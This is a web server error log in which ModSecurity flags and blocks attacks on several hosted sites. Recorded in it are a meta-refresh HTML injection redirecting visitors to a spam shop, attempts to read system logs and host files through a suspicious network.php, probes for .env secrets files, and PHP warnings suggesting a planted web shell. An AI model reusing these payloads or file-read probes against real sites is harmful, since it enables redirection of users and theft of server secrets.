[Tue May 12 01:50:26.317077 2026] [security2:error] [pid 1695975:tid 1695993] [client 27.78.84.116:63841] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-2 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQtVI9ymHBxup749_xgAAAI8"]
[Tue May 12 01:50:26.317509 2026] [security2:error] [pid 1695975:tid 1695993] [client 27.78.84.116:63841] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQtVI9ymHBxup749_xgAAAI8"]
[Tue May 12 01:50:26.317798 2026] [security2:error] [pid 1695975:tid 1695993] [client 27.78.84.116:63841] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQtVI9ymHBxup749_xgAAAI8"]
[Tue May 12 01:50:27.115893 2026] [security2:error] [pid 1709071:tid 1709111] [client 27.78.84.116:63944] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps:/olv.elupc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQ7vMumyrWMfSu7qbngAAANg"]
[Tue May 12 01:50:27.116282 2026] [security2:error] [pid 1709071:tid 1709111] [client 27.78.84.116:63944] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQ7vMumyrWMfSu7qbngAAANg"]
[Tue May 12 01:50:27.117635 2026] [security2:error] [pid 1709071:tid 1709111] [client 27.78.84.116:63944] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQ7vMumyrWMfSu7qbngAAANg"]
[Tue May 12 01:50:27.118137 2026] [security2:error] [pid 1709071:tid 1709111] [client 27.78.84.116:63944] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag " [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQ7vMumyrWMfSu7qbngAAANg"]
[Tue May 12 01:50:27.118349 2026] [security2:error] [pid 1709071:tid 1709111] [client 27.78.84.116:63944] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps:/olv.ElUpc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Simple evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-2 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQ7vMumyrWMfSu7qbngAAANg"]
[Tue May 12 01:50:27.118764 2026] [security2:error] [pid 1709071:tid 1709111] [client 27.78.84.116:63944] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQ7vMumyrWMfSu7qbngAAANg"]
[Tue May 12 01:50:27.119018 2026] [security2:error] [pid 1709071:tid 1709111] [client 27.78.84.116:63944] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJrQ7vMumyrWMfSu7qbngAAANg"]
[Tue May 12 01:50:28.054233 2026] [:error] [pid 1691274:tid 1691297] [client 66.249.75.166:45962] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:50:38.249246 2026] [security2:error] [pid 1707624:tid 1707685] [client 43.133.60.72:52174] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/wp-comments-post.php"] [unique_id "agJrTrOxS7i6i_mT2NK6vgAAAEM"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720861/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720861/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720861/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720861/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720861/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720861/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:51:06.666318 2026] [security2:error] [pid 1691274:tid 1691291] [client 216.73.216.110:20817] ModSecurity: Warning. Matched phrase "etc/hosts" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/hosts found within ARGS:filesrc: /etc/hosts.allow.rpmsave"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJralfdQaraX_prmqcRXwAAAA8"]
[Tue May 12 01:51:06.667128 2026] [security2:error] [pid 1691274:tid 1691291] [client 216.73.216.110:20817] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJralfdQaraX_prmqcRXwAAAA8"]
[Tue May 12 01:51:06.765919 2026] [security2:error] [pid 1691274:tid 1691291] [client 216.73.216.110:20817] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJralfdQaraX_prmqcRXwAAAA8"]
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704253/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704253/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704253/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704253/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704253/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704253/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/953/task/953/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/953/task/953/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/953/task/953/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/953/task/953/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/953/task/953/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/953/task/953/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:51:59.907805 2026] [:error] [pid 1730207:tid 1730231] [client 157.55.39.225:16977] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:52:09.732389 2026] [security2:error] [pid 1730207:tid 1730218] [client 216.73.216.110:52462] ModSecurity: Warning. Matched phrase "var/log/boot.log" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/boot.log found within ARGS:filesrc: /var/log/boot.log-20260504"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJrqTue9Sp-pIv_Bb6CVQAAAUk"]
[Tue May 12 01:52:09.733049 2026] [security2:error] [pid 1730207:tid 1730218] [client 216.73.216.110:52462] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJrqTue9Sp-pIv_Bb6CVQAAAUk"]
[Tue May 12 01:52:09.832849 2026] [security2:error] [pid 1730207:tid 1730218] [client 216.73.216.110:52462] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJrqTue9Sp-pIv_Bb6CVQAAAUk"]
[Tue May 12 01:52:58.160481 2026] [security2:error] [pid 1707624:tid 1707705] [client 146.56.197.150:33876] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agJr2rOxS7i6i_mT2NK7YAAAAFc"]
[Tue May 12 01:53:17.592294 2026] [security2:error] [pid 1707624:tid 1707683] [client 43.153.71.132:34064] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tct-telecom.fr"] [uri "/"] [unique_id "agJr7bOxS7i6i_mT2NK7hQAAAEE"]
[Tue May 12 01:53:18.508075 2026] [security2:error] [pid 1691274:tid 1691292] [client 176.65.139.233:36800] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev2.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJr7lfdQaraX_prmqcSPAAAABA"]
[Tue May 12 01:53:18.508295 2026] [security2:error] [pid 1691274:tid 1691292] [client 176.65.139.233:36800] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev2.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJr7lfdQaraX_prmqcSPAAAABA"]
[Tue May 12 01:53:20.048504 2026] [security2:error] [pid 1730175:tid 1730179] [client 43.153.71.132:35774] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tct-telecom.fr"] [uri "/"] [unique_id "agJr8Ho6NvB9WXx5V-5vPwAAAQI"], referer: http://www.tct-telecom.fr
[Tue May 12 01:53:20.159162 2026] [security2:error] [pid 1691274:tid 1691292] [client 176.65.139.233:36800] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev2.rentparadise.fr"] [uri "/index.php"] [unique_id "agJr7lfdQaraX_prmqcSPAAAABA"]
[Tue May 12 01:53:20.499892 2026] [security2:error] [pid 1707624:tid 1707693] [client 176.65.139.236:41486] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev3.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJr8LOxS7i6i_mT2NK7iwAAAEs"]
[Tue May 12 01:53:20.500132 2026] [security2:error] [pid 1707624:tid 1707693] [client 176.65.139.236:41486] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev3.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJr8LOxS7i6i_mT2NK7iwAAAEs"]
[Tue May 12 01:53:20.859739 2026] [security2:error] [pid 1730175:tid 1730195] [client 176.65.139.233:36802] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/app/.env"] [unique_id "agJr8Ho6NvB9WXx5V-5vQAAAARI"]
[Tue May 12 01:53:20.859973 2026] [security2:error] [pid 1730175:tid 1730195] [client 176.65.139.233:36802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/app/.env"] [unique_id "agJr8Ho6NvB9WXx5V-5vQAAAARI"]
[Tue May 12 01:53:21.466201 2026] [security2:error] [pid 1730175:tid 1730195] [client 176.65.139.233:36802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJr8Ho6NvB9WXx5V-5vQAAAARI"]
[Tue May 12 01:53:21.558880 2026] [security2:error] [pid 1707624:tid 1707693] [client 176.65.139.236:41486] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev3.rentparadise.fr"] [uri "/index.php"] [unique_id "agJr8LOxS7i6i_mT2NK7iwAAAEs"]
[Tue May 12 01:53:21.701099 2026] [security2:error] [pid 1695975:tid 1695998] [client 43.153.71.132:38472] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agJr8dVI9ymHBxup74-AhQAAAJQ"], referer: https://www.tct-telecom.fr/
